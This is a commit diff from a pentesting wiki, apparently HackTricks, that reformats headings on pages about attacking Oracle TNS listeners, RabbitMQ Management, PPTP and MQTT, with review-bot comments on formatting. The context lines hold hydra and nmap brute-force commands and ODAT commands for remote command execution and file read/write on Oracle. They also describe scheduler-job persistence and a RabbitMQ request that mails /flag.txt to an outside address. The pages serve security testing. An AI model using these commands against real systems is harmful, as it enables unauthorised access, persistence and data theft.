Commit

fix mess 2
carlospolop committed May 1, 2022
1 parent dd63321 commit 523c520
Showing 291 changed files with 2,710 additions and 3,266 deletions.
42 changes: 20 additions & 22 deletions pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 1521,1522-1529 - Pentesting Oracle TNS Listener

## Basic Information
# Basic Information

Oracle database \(Oracle DB\) is a relational database management system \(RDBMS\) from the Oracle Corporation \(from [here](https://www.techopedia.com/definition/8711/oracle-database)\).

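Review bot: removing the `# 1521,1522-1529 - Pentesting Oracle TNS Listener` title and promoting `## Basic Information` to `# Basic Information` leaves this file with one H1 per section (`# Basic Information`, `# Summary`, `# Enumeration`, ...) and no heading that names the ports, which now survive only in the file path. If the page title is meant to come from the book navigation that is defensible, but say so in the commit message, and note that the same commit does the opposite in the TNS Poison file (keeps `# TNS Poison`, drops the duplicate `##`). Also, two blank lines are now left between `</details>` and the first heading; one is enough.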
Expand All @@ -30,7 +28,7 @@ When enumerating Oracle the first step is to talk to the TNS-Listener that usual
1748/tcp open oracle-tns Oracle TNS Listener
```

## Summary
# Summary

1. **Enumerate version** info \(search for **known vulns**\)
2. **Bruteforce TNS listener** communication \(not always needed\)
Expand All @@ -40,11 +38,11 @@ When enumerating Oracle the first step is to talk to the TNS-Listener that usual

In order to user MSF oracle modules you need to install some dependencies: [**Installation**](oracle-pentesting-requirements-installation.md)

## Enumeration
# Enumeration

Tools that can be used for this are: nmap, MSF and [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).

### TNS listener version
## TNS listener version

```bash
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
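Review bot: the context line `In order to user MSF oracle modules you need to install some dependencies` has a typo, `user` should be `use`; since this hunk already touches the neighbouring headings, fix it here rather than in a follow-up.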
Expand Down Expand Up @@ -74,9 +72,9 @@ hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

The TNS listener could be vulnerable to **MitM** attacks. [Check here how to check if the server is vulnerable and how to perform the attack \(all versions up to version 12c are\)](tns-poison.md).

### SID enumeration
## SID enumeration

#### **What is a SID**
### **What is a SID**

The SID \(Service Identifier\) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

Expand Down Expand Up @@ -118,15 +116,15 @@ In order to use **oracle\_login** with **patator** you need to **install**:
pip3 install cx_Oracle --upgrade
```

## **Targeting Accounts**
# **Targeting Accounts**

**Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.

**Metasploit** _**scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.

**Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while!

### **Default Passwords**
## **Default Passwords**

Below are some of the default passwords associated with Oracle:

Expand All @@ -141,7 +139,7 @@ Other **default passwords** can be found [here ](http://www.petefinnigan.com/def

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. [**Read more about this technique here.**](remote-stealth-pass-brute-force.md)

### User/Pass bruteforce
## User/Pass bruteforce

Different tools offered **different user/pass lists** for oracle:

Expand All @@ -156,7 +154,7 @@ I have **mixed** all of them and **removed duplicates:**

{% file src="../../.gitbook/assets/pass-oracle.txt" %}

### [Brute Force](../../brute-force.md#oraclesql)
## [Brute Force](../../brute-force.md#oraclesql)

Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps:

Expand All @@ -182,7 +180,7 @@ sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
sqlplus SYSTEM/[email protected]/ORCL 'as sysdba'
```

## **All in One**
# **All in One**

**An interesting tool is oscanner**, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

Expand All @@ -209,35 +207,35 @@ For **each valid account** \(e.g. _SYS_\) **on each valid instance** \(SID\), OD

[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)

## Remote Code Execution
# Remote Code Execution

There are at least two different ways to execute commands, such as by using Java procedures and DBMS\_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: [ODAT](https://github.com/quentinhardy/odat).

### Install ODAT
## Install ODAT

```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #It shouldn't be problems in Kali
```

### Execute Code via Java Stored Procedure
## Execute Code via Java Stored Procedure

```bash
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
```

[More details here](oracle-rce-and-more.md#rce-java-store-procedure)

### Execute code via Scheduler
## Execute code via Scheduler

```bash
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"
```

[More details here](oracle-rce-and-more.md#rce-scheduler)

### Execute code via External Tables
## Execute code via External Tables

```bash
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"
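Review bot: the `dbmsscheduler` example inside the fenced block contains HTML entities, `echo 123&gt;&gt;C:\hacK`; Markdown does not decode entities inside a code fence, so readers copy `&gt;&gt;` literally instead of `>>`. Replace them with the raw characters. The heading `## Execute Code via Java Stored Procedure` is spelled correctly here, but the page it links to still says `Java Store Procedure`; align the two.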
Expand All @@ -247,7 +245,7 @@ cd odat

[More details here.](oracle-rce-and-more.md#rce-external-tables)

## Read/Write files
# Read/Write files

```bash
./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
Expand All @@ -256,7 +254,7 @@ cd odat

[More details here](oracle-rce-and-more.md#read-write-files)

## Elevating Privileges
# Elevating Privileges

[More details here](oracle-rce-and-more.md#elevating-privileges)

Expand All @@ -272,7 +270,7 @@ Vulnerability tested on oracle 10.1.0.3.0 – should work on thru 10.1.0.5.0 and
msf> use auxiliary/sqli/oracle/lt_findricset_cursor
```

## Free Virtual Environment for testing
# Free Virtual Environment for testing

If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:

Expand All @@ -284,7 +282,7 @@ Other interesting **references**:

[http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)

## HackTricks Automatic Commands
# HackTricks Automatic Commands

```text
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# Oracle Pentesting requirements installation

## Installation of tools (sqlplus) and needed libraries to use the oracle MSF modules
# Installation of tools (sqlplus) and needed libraries to use the oracle MSF modules

_(This installation guide was created for version 12.1.0.1.0, change that name for the version that you download)_

Expand Down Expand Up @@ -63,7 +61,7 @@ If you have succeeded, you should be able to run `sqlplus` from a command prompt
sqlplus <username>/<password>@<ip_address>/<SID>;
```

### **Step Two — Install Ruby Gem ruby-oci8**
## **Step Two — Install Ruby Gem ruby-oci8**

_These steps are needed to use metasploit oracle modules_

Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# Oracle RCE & more

## RCE: Java Store Procedure
# RCE: Java Store Procedure

So, imagine that you have the administrator account information. In this case, a very popular way to execute your command on the server is to write a ‘java stored’ procedure. This is done in three stages. First, create a Java class called ‘oraexec’. To do this, connect via ‘sqlplus’ terminal and write:

Expand Down Expand Up @@ -56,7 +54,7 @@ Note that when using the above procedure, we cannot see the results of executed

However, there is a \[more sophisticated script\] \(goo.gl/EuwPRU\) that handles the command output, but it has a larger size [here](https://oracle-base.com/articles/8i/shell-commands-from-plsql).

## RCE: Scheduler
# RCE: Scheduler

The next method, which will help us if there is no Java virtual machine, is to use ‘dbmsscheduler’, the built-in task scheduler of Oracle. To use it, you must have the privilege ‘CREATE EXTERNAL JOB’. Here’s a code sample that implements the entry of ‘0wned’ string into a text file in the root of the C: drive:

Expand All @@ -73,7 +71,7 @@ select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''xxx'

Note that, when you use the Scheduler, you can run this job more than once and do it with some frequency. As a result, this will help you get a foothold in the tested system, because, even if the administrator deletes the user from OS, this job, which is regularly running in the system, will bring him or her back to life.

## RCE: External Tables
# RCE: External Tables

As the last method for achieving the execution of OS commands, I would like to mention the use of External Tables. This method will help you later download files from the server. You will need the following privileges:

Expand Down Expand Up @@ -131,7 +129,7 @@ The terminal will start to display error messages that the system cannot match t

‘ODAT.py’ utility also can implement this attack. However, it requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory.

## Read/Write files
# Read/Write files

Now, let’s proceed to the task of reading and writing the files. If you simply need to read or write a file to the server, you can do it without any Java procedures, which, however, can also handle such tasks. Let’s have a look into ‘UTL\_FILE’ package that has the functionality required for working with the file system. The good news is that, by default, it can be accessed by all users with ‘PUBLIC’ role. The bad news is that, by default, this procedure has no access to the entire file system, but only to a directory pre-defined by the administrator. However, it is not uncommon to find a directory parameter specified as ‘\*’, which literally means “access to everything.” You can find this out by using the following command:

Expand Down Expand Up @@ -176,7 +174,7 @@ The second method that I would like to mention is to use again the ‘External T
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
```

## Elevating Privileges
# Elevating Privileges

You can use various methods to elevate privileges, ranging from classic buffer overflows and DLL patching to specialized attacks against databases, such as PL/SQL injections. The topic is very extensive and, in this article, I will not dwell on it, as this is discussed in large research papers, such as those found in the blogs of \[Lichfield\] \(goo.gl/IebQN4\) and \[Finnigan\] \(goo.gl/vXhttf\). I will just demonstrate some of them, so that you have a general idea. During the testing, I recommend simply paying attention to current privileges and, based on this, search for desired loopholes in the Internet.

Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# Remote stealth pass brute force

## Outer Perimeter: Remote stealth pass brute force
# Outer Perimeter: Remote stealth pass brute force

**The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable** to this technique. In order to understand the idea behind this vulnerability, you need to consider how the authentication protocol works with the database. I will show it for version 11. The interaction with the server proceeds as follows:

Expand All @@ -38,7 +36,7 @@ Summing it all up:
2. Extract **HEX values for AUTH\_SESSKEY, AUTH\_VFR\_DATA**.
3. Insert them into [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.

### Using nmap and john
## Using nmap and john

```
root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Expand Up @@ -19,8 +19,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

# TNS Poison

## TNS Poison

If you encounter a newer version of the listener, there is not much room left except brute-forcing. However, all versions up to version 12c are vulnerable to an attack called ‘TNS Poison’. Though the latter version is vulnerable only in some special configurations. For example, one of the ways to fix this vulnerability is by disabling the dynamic configuration of the listener, which is impossible when using Oracle DataGuard, PL/SQL Gateway in connection with APEX and in some versions of SAP. In general, the issue is that, by default, the listener service supports remote configuration and, in addition, it allows to do it anonymously. This is where the heart of vulnerability lies.

[![Fig. 1. TNS Poison Vulnerability](https://hackmag.com/wp-content/uploads/2015/04/poison.png)](https://hackmag.com/wp-content/uploads/2015/04/poison.png)
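Review bot: this is the cleaner shape, keep the single `# TNS Poison` H1 and drop the duplicate `## TNS Poison`, but it is the opposite of what the Oracle README, RabbitMQ, PPTP and MQTT files in this same commit do (they delete the H1 title and promote every `##` to `#`). Pick one convention for the whole commit; otherwise some pages render with a title and others with a heading-per-section and no title.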
8 changes: 3 additions & 5 deletions pentesting/15672-pentesting-rabbitmq-management.md
Expand Up @@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 15672 - Pentesting RabbitMQ Management

## Basic Information
# Basic Information

You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\
In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\
The main page should looks like this:

![](<../.gitbook/assets/image (270).png>)

## Enumeration
# Enumeration

The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form).

Expand Down Expand Up @@ -57,7 +55,7 @@ Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"[email protected]\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```

### Shodan
## Shodan

* `port:15672 http`

11 changes: 5 additions & 6 deletions pentesting/1723-pentesting-pptp.md
Expand Up @@ -17,23 +17,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 1723 - Pentesting PPTP
# Basic Information

## Basic Information

Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol \(PPTP\) uses TCP port 1723 for key exchange and IP protocol 47 \(GRE\) to encrypt data between peers.
Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol \(PPTP\) uses TCP port 1723 for key exchange and IP protocol 47 \(GRE\) to encrypt data between peers.

**Default Port**:1723

## Enumeration
# Enumeration

```bash
nmap –Pn -sSV -p1723 <IP>
```

### [Brute Force](../brute-force.md#pptp)
## [Brute Force](../brute-force.md#pptp)

## Vulnerabilities
# Vulnerabilities

{% embed url="https://www.schneier.com/academic/pptp/" %}

18 changes: 8 additions & 10 deletions pentesting/1883-8883-pentesting-mqtt-mosquitto.md
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 1883,8883 - Pentesting MQTT (Mosquitto)

## Basic Information
# Basic Information

MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.

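Review bot: context line typo in the Basic Information paragraph, `ideal of the emerging "machine-to-machine" (M2M) or "Internet of Things" world` should be `ideal for`.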
Expand All @@ -30,15 +28,15 @@ PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```

## Inspecting the traffic
# Inspecting the traffic

MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**

![](<../.gitbook/assets/image (645) (1).png>)

### [**Brute-Force MQTT**](../brute-force.md#mqtt)
## [**Brute-Force MQTT**](../brute-force.md#mqtt)

## Pentesting MQTT
# Pentesting MQTT

**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.

Expand Down Expand Up @@ -91,11 +89,11 @@ if __name__ == "__main__":
main()
```

## More information
# More information

from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)

### The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
## The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>

The publish/subscribe model is composed of:

Expand All @@ -106,7 +104,7 @@ The publish/subscribe model is composed of:

![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png)

### Packet Format <a href="#f15a" id="f15a"></a>
## Packet Format <a href="#f15a" id="f15a"></a>

Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header

Expand All @@ -116,7 +114,7 @@ The first field of the fixed header represents the type of the MQTT Packet. All

![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png)

## Shodan
# Shodan

* `port:1883 MQTT`
* `port:8883 MQTT`

0 comments on commit 523c520